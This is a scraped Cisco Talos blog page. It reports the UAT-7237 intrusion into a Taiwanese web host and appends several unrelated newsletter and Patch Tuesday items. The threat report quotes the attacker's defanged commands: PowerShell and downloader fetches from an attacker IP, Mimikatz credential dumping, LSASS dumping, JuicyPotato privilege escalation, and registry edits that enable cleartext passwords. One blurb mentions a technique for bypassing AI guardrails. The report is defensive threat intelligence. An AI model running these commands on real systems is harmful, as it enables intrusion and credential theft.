Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.

*   Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
*   UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
*   UAT-7237 aims to establish long-term persistence in high-value victim environments.
*   Talos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as “SoundBill.”

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

*   UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.
*   After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's deployment of web shells is highly selective and only on a chosen few compromised endpoints.
*   While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

**Initial access and reconnaissance**

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

cmd /c nslookup <victim’s\_domain>
cmd /c systeminfo
cmd /c curl
cmd /c ping 8\[.\]8\[.\]8\[.\]8                            
cmd /c ping 141\[.\]164\[.\]50\[.\]141          // Attacker controlled remote server.
cmd /c ping <victim’s\_domain>
cmd /c ipconfig /all

While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:

cmd /c c:\\temp\\WM7Lite\\download\[.\]exe  hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar c:\\temp\\WM7Lite\\1\[.\]rar

powershell (new-object System\[.\]Net\[.\]WebClient).DownloadFile('hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/vpn\[.\]rar','C:\\Windows\\Temp\\vmware-SYSTEM\\vmtools\[.\]rar')

Once UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&net use
cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&dir \\\\<remote\_smb\_share>\\c$\\
cmd\[.\]exe /c cd /d "C:\\"&net group "domain admins" /domain
cmd\[.\]exe /c cd /d "C:\\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:

cmd\[.\]exe /c cd /d "C:\\"&C:\\ProgramData\\dynatrace\\sharpwmi\[.\]exe <IP> <user> <pass> cmd whoami

cmd.exe /c cd /d "C:\\DotNet\\"&WMIcmd.exe

wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami
  
wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\\1.txt

 SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:

cmd.exe /c systeminfo
cmd.exe /c tasklist
cmd.exe /c net1 user /domain
cmd.exe /c whoami /priv
cmd.exe /c quser

**Post-compromise tooling and actions on objectives****SoundBill**

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is built based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named “ptiti.txt” and execute the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

c:\\temp\\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws

**JuicyPotato**

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

**Configuration changes**

During intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG\_DWORD /d 1 /f

They also attempted to enable storage of cleartext passwords:

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:

mmc comexp.msc

**UAT-7237's pursuit of credentials**

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:

**Filename/command**

**Tooling name**

abc.dll

Comsvcs.dll for LSASS process dumping

Fileless.exe

Mimikatz

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

SoundBill with the Mimikatz payload

Furthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"
dir c:\\\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:

cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c  C:\\hotfix\\1.bat"
cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c   C:\\hotfix\\Project1.exe  C:\\hotfix\\SSP.dll"

“Project1\[.\]exe” above is the ssp\_dump\_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c  {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\\windows\\system32\\cmd.exe"  -a "/c c:\\hotfix\\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

cmd.exe /c "c:\\program files\\7-Zip\\7z.exe"  a  C:\\hotfix\\1.zip  C:\\hotfix\\1.bin

**Proliferating through the enterprise**

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner tool used to scan for open ports against IP subnets:

fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB services information on specific endpoints:

smb\_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:

cmd\[.\]exe /c netstat -ano |findstr 3389
cmd\[.\]exe /c nslookup <victim’s\_subdomains>
cmd\[.\]exe /c net use  <IP>\\ipc$ <pass>  /user:<userid>
cmd\[.\]exe /c dir   \\\\<remote\_system>\\c$
cmd\[.\]exe /c net use  \\\\<remote\_system>\\ipc$ /del

**SoftEther VPN**

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

*   The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
*   UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

*   Snort v2 : 64908 - 64916
*   Snort v3: 301209 - 301212

**IOCs**

 IOCs for this research can also be found at our GitHub repository here. 

450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe
6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp\_dump\_lsass tool
E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan
B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb\_version.exe
864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz
 
SoundBill
Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386
 
Cobalt Strike
0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7
7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f
 
cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws
http\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar
141\[.\]164\[.\]50\[.\]141

UAT-7237 targets Taiwanese web hosting infrastructure

Hazel braves Vegas, overpriced water and the Black Hat maze to bring you Talos’ latest research — including a deep dive into the PS1Bot malware campaign.

Thursday, August 14, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I’ve decided Black Hat feels exactly like trying to run in a dream — you’re always heading somewhere, never quickly, and the water costs $8.

I don’t mean to complain (although, as a Brit, I’m practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.

Rather than recap everything we did (our YouTube channel will have plenty of research highlights soon), here are three standouts: 

*   **Joe Marshall’s live incident-response exercise** – Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you’re curious, you can find the cards online here. With a websharing tool, you can stream it to any size audience and have people play along virtually. You can also read more about Joe’s experience developing the game, alongside a video walkthrough, in his new blog post.
*   **Amy Chang’s AI guardrail bypass research** – Amy’s booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called “_decomposition.”_ Her work drew attention from media outlets including TechRepublic, SecurityWeek and WebProNews.
*   **Philippe Laulheret’s _ReVault_ presentation** – Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now read the full technical deep dive covering the research process and exploit breakdown.

We’ll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).

**The one big thing **

Cisco Talos has identified a widespread malvertising campaign distributing a multi-stage malware framework Talos calls “PS1Bot,” which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025. 

**Why do I care? **

Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk — especially if you use cryptocurrency wallets or save passwords in browsers. 

**So now what? **

Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' blog also provides Snort SIDs and ClamAV detections. 

**Top security headlines of the week **

**Russian government hackers said to be behind US federal court filing system hack**   
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (TechCrunch) 

**North Korean Kimsuky hackers exposed in alleged data breach**   
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (Bleeping Computer) 

**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn’t.**   
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (DataBreaches) 

**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**   
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (Bleeping Computer) 

**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**   
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (SecurityWeek) 

**Can’t get enough Talos? **

*   **Microsoft Patch Tuesday for August 2025**   
    Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.   
*   **ReVault! When your SoC turns against you… deep dive edition**   
    Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault.” 100+ models of Dell Laptops are affected by this vulnerability if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls. 
*   **The TTP:** **Cyber criminals brought PowerShell 1.0 to a modern ransomware fight**   
    Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks. 
*   **Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst**   
    A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). 

**Upcoming events where you can find Talos **

BlueTeamCon (Sept. 4 – 7) Chicago, IL 

LABScon (Sept. 17 – 20) Scottsdale, AZ 

VB2025 (Sept. 24 – 26) Berlin, Germany 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**   
MD5: 8c69830a50fb85d8a794fa46643493b2    
VirusTotal: https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0   
Typical Filename: AAct.exe    
Claimed Product: N/A    
Detection Name: PUA.Win.Dropper.Generic::1201 

**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**   
MD5: 906282640ae3088481d19561c55025e4   
VirusTotal: https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08    
Typical Filename: AAct\_x64.exe   
Claimed Product: N/A   
Detection Name: PUA.Win.Tool.Winactivator::1201

What happened in Vegas (that you actually want to know about)

Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”

Malvertising campaign leads to PS1Bot, a multi-stage malware framework

Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.  
In this month's release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out

Tuesday, August 12, 2025 15:39

Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.  

In this month's release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 "critical" entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.  

CVE-2025-50176 is an RCE vulnerability in DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of resource using incompatible type ('type confusion') in Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is "more likely". 

CVE-2025-50177 is an RCE vulnerability in Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where use after free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in a rapid sequence over HTTP to a MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.  

CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network, with an attacker successfully exploiting this vulnerability gaining SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows server 2008, Windows Server 2012, Windows Server 2026, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”. 

CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.  

CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-53766 is a remote code execution vulnerability in GDI+, a graphics Windows subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8 where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. An attacker can use an uninitialized function pointer being called when decoding a JPEG image. This can be embedded in Office and 3rd party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.

CVE-2025-49707 is a spoofing vulnerability in Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allow an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VM. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-48807 is a remote code execution vulnerability in Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may result in an attacker executing code locally in a nested guest VM to escape their VM and gain admin privileges on the guest VM that is serving as the host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VM. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”. 

CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.  

Talos would also like to highlight the following "important" vulnerabilities as Microsoft has determined that their exploitation is "more likely:"   

CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability 

CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability,  

CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability 

CVE-2025-50168: Win32k Elevation of Privilege Vulnerability 

CVE-2025-53132: Win32k Elevation of Privilege Vulnerability 

CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 

CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability 

CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.    

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.    

 Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234- 65237, 65240-65247.  

The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.

Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities

Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault”.

ReVault! When your SoC turns against you… deep dive edition

Can AI really write safer code? Martin dusts off his software engineer skills to put it it to the test. Find out what AI code failed at, and what it was surprisingly good at. Also, we discuss new research on how AI LLM models can be used to assist in the reverse engineering of malware.

Thursday, August 7, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

Vulnerabilities within software are a persistent challenge. Software engineers inadvertently tend to make the same mistakes repeatedly, with the same entries appearing in the annual top 25 list of Common Weakness Enumerations each year. 

The truth is, writing software is difficult. Software engineering is a craft demands concentration, knowledge and time, all coupled with extensive testing. Even the most skilled software engineer can get distracted or have a bad day, leading to a hidden vulnerability inadvertently making its way into a production codebase. 

Identifying vulnerabilities early in the software development process is one of the promises of AI. The idea being that an AI agent would write perfect code under the direction of a software engineer or verify and correct code written by a human. 

Last weekend, I decided to put this premise to the test. As a somewhat rusty software engineer, I resolved to see if AI could assist me with a personal software project. Initially, I was impressed, the AI agent offered an engaging discussion about high-level architecture and the trade-offs of various approaches. I was amazed at the lines of code that the AI generated on request. All the software for my project written at the press of a button! 

Then came the testing. Although the code looked convincing, it failed to interface with the required libraries. Parameters were incorrect, it tried to call fictional functions. It seemed that the way the AI imagined the library to work didn’t reflect reality or the available documentation. Similarly, there were less sanity checks or verification of variable values than I was comfortable with; especially since many of these were derived from external inputs. 

To be fair, the AI code resolved a tricky threading issue that had defeated me, and the ‘boilerplate’ code necessary to form the skeleton structure of the software was flawless. I felt that I achieved a productivity boost from the AI’s exposure to ‘frequently encountered’ coding issues. However, when it came to more esoteric APIs with which I was moderately familiar, the AI was unable to generate functional code or correctly diagnose reported errors. 

After some debugging and manual rewriting, I managed to create a working prototype. The code is clearly not bulletproof, but then again, I hadn’t explicitly asked for code that was secured against all potential hacks. Like many software engineers, myself and my AI assistant focused on quickly delivering the desired functionality, rather than considering the long-term operation of the code in a potentially hostile environment. 

I remain optimistic that AI assisted coding is the pathway to a software vulnerability free future. However, my recent limited personal experience leads me to think that we still have a considerable journey ahead before we can definitively resolve software vulnerabilities for good. 

I hope you all have a tremendous time at Summer Camp, see a lot of old friends and make new ones and most importantly that you shower and use deodorant. Conference season is a marathon, it’s long, it’s arduous, it’s sweaty – be the hygienic change you want to see in the world.  

**The one big thing **

Continuing the AI theme, Guilherme describes how AI LLM models can be used to assist in the reverse engineering of malware. Used correctly, LLMs can provide valuable insights and facilitate the analysis of malware. 

**Why do I care? **

Reverse engineering malware is the often time-consuming task of identifying the execution path of malicious software. Frequently malware writers obfuscate their code to make it difficult to understand and follow what their code is doing. Advances in technology that can speed up this process make fighting malware easier.  

**So now what? **

Investigate if the tools and approaches described in the blog can be used to improve your reverse engineering process, or as a means to begin learning about reverse engineering. 

**Top security headlines of the week ****As ransomware gangs threaten physical harm, 'I am afraid of what's next,' ex-negotiator says**

In an effort to increase the pressure on victims, ransomware gangs are now using threats of physical violence. (The Register)

**‘Shadow AI’ increases cost of data breaches, report finds**

Unmanaged and unsecured use of AI is leading to data breaches. (Cybersecurity Dive)

****Enough to drive a cybersecurity officer mad: one rule here, a different rule there****

Chief information security officers call for less fragmentation in global cybersecurity regulations. (ASPI)

****UK Online Safety Act promotes insecurity****

The implementation of the UK Online Safety Act requiring age verification for content deemed harmful to children introduces some security quandaries. (Tech HQ)

**Can’t get enough Talos? ****Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst**

A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). **Watch here.**

**Tales from the Frontlines**

Join the Cisco Talos Incident Response team to hear real-world stories from the frontlines of cyber defense. **Reserve your spot.**

**Vulnerability roundup**

